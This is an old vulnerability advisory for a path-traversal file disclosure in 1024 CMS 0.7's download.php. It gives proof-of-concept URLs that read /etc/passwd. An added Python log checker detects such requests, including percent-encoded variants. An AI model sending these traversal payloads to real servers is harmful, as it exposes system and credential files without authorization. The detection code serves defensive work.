1024 CMS 0.7 (download.php item) Remote File Disclosure Vulnerability

2007-05-02 00:00:00

\#'#/
(-.-)
--------------------oOO---(_)---OOo-------------------
| [ Y! Underground Group ] |
| [ www.dj7xpl.2600.ir ] |
| [ Dj7xpl @ 2600.ir ] |
------------------------------------------------------


<--------------------------------------------------------------------------------------------------------------------->

[!] Portal : 1024 CMS Version 0.7
[!] Vendor : http://www.treble.lfhost.com
[!] Author : Dj7xpl
[!] Type : Remote File Disclosure Vuln
[!] We Are : Y4Ho0 -Mr.Mithridates -Sir SiSiLi -System Failure -Satanic Soulfull -And Me

<--------------------------------------------------------------------------------------------------------------------->

PoC :

http://[Target]/[Path]/includes/download.php?item=../uploads/[File]
http://Target.com/1024/includes/download.php?item=../uploads/../../../../../etc/passwd

<--------------------------------------------------------------------------------------------------------------------->
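
Added example (not part of the original advisory, and not 1024 CMS code): a log check that flags download.php requests whose item value resolves outside uploads/, including percent-encoded variants of the PoC above. The includes/ and uploads/ layout is assumed from the PoC URLs; the function names and sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Assumption from the PoC URLs: download.php lives in includes/ and
# legitimate downloads live in the sibling uploads/ directory.
REQUEST_RE = re.compile(r'"(?:GET|HEAD|POST) (\S+) HTTP/[\d.]+"')

def resolve_item(item):
    """Resolve item relative to includes/; None if it climbs above the app root."""
    for _ in range(3):                      # peel extra percent-encoding layers
        decoded = unquote(item)
        if decoded == item:
            break
        item = decoded
    if "\x00" in item:                      # NUL byte in a file name is never valid
        return None
    parts = ["includes"]
    for seg in item.replace("\\", "/").split("/"):
        if seg in ("", "."):
            continue
        if seg == "..":
            if not parts:                   # already at the app root
                return None
            parts.pop()
        else:
            parts.append(seg)
    return parts

def is_traversal(log_line):
    """True if the line requests download.php with an item outside uploads/."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return False
    url = urlsplit(m.group(1))
    if not url.path.lower().endswith("/includes/download.php"):
        return False
    for value in parse_qs(url.query, keep_blank_values=True).get("item", []):
        parts = resolve_item(value)
        if parts is None or len(parts) < 2 or parts[0] != "uploads":
            return True
    return False

# Constructed sample access-log lines (not from a real server).
SAMPLE_LOG = [
    '192.0.2.10 - - [02/May/2007:10:00:01 +0000] "GET /1024/includes/download.php?item=../uploads/report.pdf HTTP/1.1" 200 5120',
    '198.51.100.7 - - [02/May/2007:10:00:05 +0000] "GET /1024/includes/download.php?item=../uploads/../../../../../etc/passwd HTTP/1.1" 200 1432',
    '198.51.100.7 - - [02/May/2007:10:00:09 +0000] "GET /1024/includes/download.php?item=%252e%252e%252fuploads%252f..%252f..%252fconfig.php HTTP/1.1" 200 800',
]

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        print("ALERT" if is_traversal(line) else "ok   ", line)
```

The same containment rule (resolve the path first, then require that it stays inside uploads/) is what a server-side fix for download.php has to enforce before opening the file.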

Fixes

No fixes
